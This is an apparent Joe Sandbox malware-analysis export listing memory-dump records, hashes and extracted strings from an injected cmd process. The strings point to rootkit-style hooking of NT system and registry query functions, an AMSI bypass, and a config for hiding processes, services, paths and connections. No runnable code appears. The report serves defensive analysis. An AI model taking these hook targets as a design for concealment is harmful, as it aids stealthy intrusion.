                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: Find$CloseFile$FirstNext
                          • String ID:
                          • API String ID: 1164774033-0
                          • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                          • Instruction ID: 3106aedaa9bc1db29f3931f9bb689b74ed9c49973e3fcd77ede45d25e4864941
                          • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                          • Instruction Fuzzy Hash: 4CA1D73370C682E9FB219B7598403FD6BE6EB817D4F944135DBAA2BE95DA34C449CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 2933794660-0
                          • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                          • Instruction ID: ccff4b742e9354236959d03df2ed758253582a02e279fce27ce63758d4e2ce7c
                          • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                          • Instruction Fuzzy Hash: 39111836714B15DAEB00CB70E8553B833A4FB19798F840E35EB6E867A4EB78C1588740
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID:
                          • API String ID: 756756679-0
                          • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                          • Instruction ID: 57d18717c3eb28c6aaaf322a3c44b8529fde4a4ab9707f3c45096237bd570314
                          • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                          • Instruction Fuzzy Hash: 3B118B22A05B95E1EA14CB7AA8042A967F2FB88FC0F984038DF5E57725EF38C4468700
                          APIs
                            • Part of subcall function 000001F119D5D220: HeapAlloc.KERNEL32(?,?,00000000,000001F119D5C987), ref: 000001F119D5D275
                            • Part of subcall function 000001F119D60EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001F119D60EEB
                          • FindFirstFileExW.KERNEL32 ref: 000001F119D5DB99
                            • Part of subcall function 000001F119D5D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001F119D5674A), ref: 000001F119D5D2B6
                            • Part of subcall function 000001F119D5D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001F119D5674A), ref: 000001F119D5D2C0
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 2436724071-0
                          • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                          • Instruction ID: 5bde14d55d421701dfee4ad0f02ebed0ae7c37834e1d17cabc49880fdff08724
                          • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                          • Instruction Fuzzy Hash: B881A132308686E5FF20DB32A5403FAA7B6E785B94F944135AFBA57799DA38C042C710
                          APIs
                            • Part of subcall function 000001F1197DD220: HeapAlloc.KERNEL32(?,?,00000000,000001F1197DC987), ref: 000001F1197DD275
                            • Part of subcall function 000001F1197E0EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001F1197E0EEB
                          • FindFirstFileExW.KERNEL32 ref: 000001F1197DDB99
                            • Part of subcall function 000001F1197DD2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001F1197D674A), ref: 000001F1197DD2B6
                            • Part of subcall function 000001F1197DD2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001F1197D674A), ref: 000001F1197DD2C0
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 2436724071-0
                          • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                          • Instruction ID: fc6ef04727d992a463fda2857fa008987b98827e80ae3e0f68f84347f44641d3
                          • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                          • Instruction Fuzzy Hash: A081C433308682E5EB209B71A5413FEA7D6EB85BD4F848135EFBA07B95DA38C4458B00
                          Memory Dump Source
                          • Source File: 00000015.00000003.1885424932.000001F119790000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F119790000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_3_1f119790000_cmd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                          • Instruction ID: 995d6e0814aaf086324ccd34921310a388e86cc814143c0920eaa98d1b8a5a2b
                          • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                          • Instruction Fuzzy Hash: 05B19F32218692E2EB58AF35D4507F963A6FB44BE4F945026DF2A53B94EF35CC48CB40
                          Memory Dump Source
                          • Source File: 00000015.00000003.1885424932.000001F119790000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F119790000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_3_1f119790000_cmd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
                          • Instruction ID: 04dacc53ca35ba80830cab19afac5b74a106f40c916a74451122b1f594fc93d9
                          • Opcode Fuzzy Hash: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
                          • Instruction Fuzzy Hash: 12A1AA32718682E5FF209B7594443FD6BA2EB41BE4F984135EF6F17695EA38C44ACB00
                          Memory Dump Source
                          • Source File: 00000015.00000003.1885424932.000001F119790000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F119790000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_3_1f119790000_cmd.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
                          • Instruction ID: 60795e39b2bbd36db3f53e05dedd32cb6ab8b678fd54419a8b8500375e7d6a8c
                          • Opcode Fuzzy Hash: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
                          • Instruction Fuzzy Hash: 2581A632718641E5EE20DF31A4403FA6B92EB85BE4F984535EFBF57795EA38C1458B00
                          Memory Dump Source
                          • Source File: 00000015.00000003.1885424932.000001F119790000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F119790000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_3_1f119790000_cmd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                          • Instruction ID: c2eaea289795deaca185a74cf0f46bccb55d58a7a6f8ac3798cc782980d5e5cf
                          • Opcode Fuzzy Hash: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                          • Instruction Fuzzy Hash: 1C1165B161C592D7F7A98F39A4513B93792FB083C4FD48039D66B86A94E73DC4948F00

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                          • String ID: SOFTWARE\$cnt-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                          • API String ID: 2135414181-2609720707
                          • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                          • Instruction ID: d22b6d6e05e4c31630e0fbe9ec1c364e3ef28a76ba41a4809c66929c17ff7acb
                          • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                          • Instruction Fuzzy Hash: E4711A36618A5AE6EF109F75E8506E92376FB85B88FC05221DF6E57B28DE34C444C780

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                          • String ID: SOFTWARE\$cnt-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                          • API String ID: 2135414181-2609720707
                          • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                          • Instruction ID: ae65c8efcccab0ff312162ab4974f2439749243774723297fe27fa12d9842dd1
                          • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                          • Instruction Fuzzy Hash: ED711936718A56E5EB10DF75E8506EC23A6FF85BCCF805121EA6E57B28EE34C548CB40

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                          • API String ID: 1735320900-4225371247
                          • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                          • Instruction ID: 81e9f1b84ff7ed2c699535f6382287ce68a3fdff22e8eda46197c6b8a39ffdc2
                          • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                          • Instruction Fuzzy Hash: 915149B4918A8FF5FE04EBB5E8916E86733B750748FC04632A72B06565DE78825AC780

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                          • String ID: d
                          • API String ID: 2005889112-2564639436
                          • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                          • Instruction ID: e22bcaf00fbac896401bfcd8aa25f3a51863f75f9e621ff7936428a07aa9195c
                          • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                          • Instruction Fuzzy Hash: B8512C32218B89E6EB24CF72E4483AA77A2F789F98F844124DB5A07758DF3CC445C740

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                          • String ID: d
                          • API String ID: 2005889112-2564639436
                          • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                          • Instruction ID: ea07e1348114554774d4e6d9953e307e7de4bf806670ae48d21ef2e063e4e9eb
                          • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                          • Instruction Fuzzy Hash: 29512D72218B95E6EB14CF72E4443AA77A2FB89FD8F844124DB5A07758EF3CC0498B00

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                          • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                          • API String ID: 740688525-1880043860
                          • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                          • Instruction ID: bc8666fc3385e0109b51b31495b208f43bcc744bc676d9d3b4dde94018c610eb
                          • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                          • Instruction Fuzzy Hash: 3B516C31709A4AE1FE149B7AA9007F92262AB59BB0FD807359F3B473D0EF38D4458750

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                          • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                          • API String ID: 740688525-1880043860
                          • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                          • Instruction ID: 47eb260d83f947d9951279eac6b7b9afad2cdffc67d9e58a704b903fa02ab741
                          • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                          • Instruction Fuzzy Hash: 01516932719616E1EE559B76A8003F96292AF48BF0FD80735DF3B473D0EB38D9498A40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: Heap$CounterInfoProcess$AllocFree
                          • String ID: \GPU Engine(*)\Running Time
                          • API String ID: 1943346504-1805530042
                          • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                          • Instruction ID: 8a52228095cb946ec881046b2584f4010f411966a4848eb1bf7a5f8166f45f0e
                          • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                          • Instruction Fuzzy Hash: CB319132A08A4AE7FF21CF72A8047A9E3A2B788B95FC40535DF5A43624DF38C855C740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: Heap$CounterInfoProcess$AllocFree
                          • String ID: \GPU Engine(*)\Running Time
                          • API String ID: 1943346504-1805530042
                          • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                          • Instruction ID: 4e4846ce418576d2f629f8eefc456ebf6f0bf1397dcb8ec5c4b287d0cae48069
                          • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                          • Instruction Fuzzy Hash: A531A932608A56E6EB11CF22A4047B9A3A2FB44BD9F844535DF5A47624EF3CC4598B40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: Heap$CounterInfoProcess$AllocFree
                          • String ID: \GPU Engine(*)\Utilization Percentage
                          • API String ID: 1943346504-3507739905
                          • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                          • Instruction ID: 9d7230192dae0765803238de90f1fdd82bf709c996ed0d979ea3e300906ee528
                          • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                          • Instruction Fuzzy Hash: AD318971608B4AEAFB10DF72A8847A9A3A2B794F84FC450349F6B43724EE38C481C740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: Heap$CounterInfoProcess$AllocFree
                          • String ID: \GPU Engine(*)\Utilization Percentage
                          • API String ID: 1943346504-3507739905
                          • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                          • Instruction ID: b9ae2af24d5bb8061eb76b84ac2ac6470890a9b0192b0f9bfd9d81898a83f1d1
                          • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                          • Instruction Fuzzy Hash: 14313032618B56E6EB50DF32A8447A963E2BB84FD8F844135DF6B47764EE38D449CA00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                          • Instruction ID: 956886b8d74ceb89ec255d7f6f2610a4a7f8dd5cf9ed0982d98e959ccf36dd46
                          • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                          • Instruction Fuzzy Hash: 08D18B72608B9AEAFF20DB7594403ED37B2F755788F901125EBAA57B9ACB34C580C701
                          APIs
                          Strings
                          Memory Dump Source
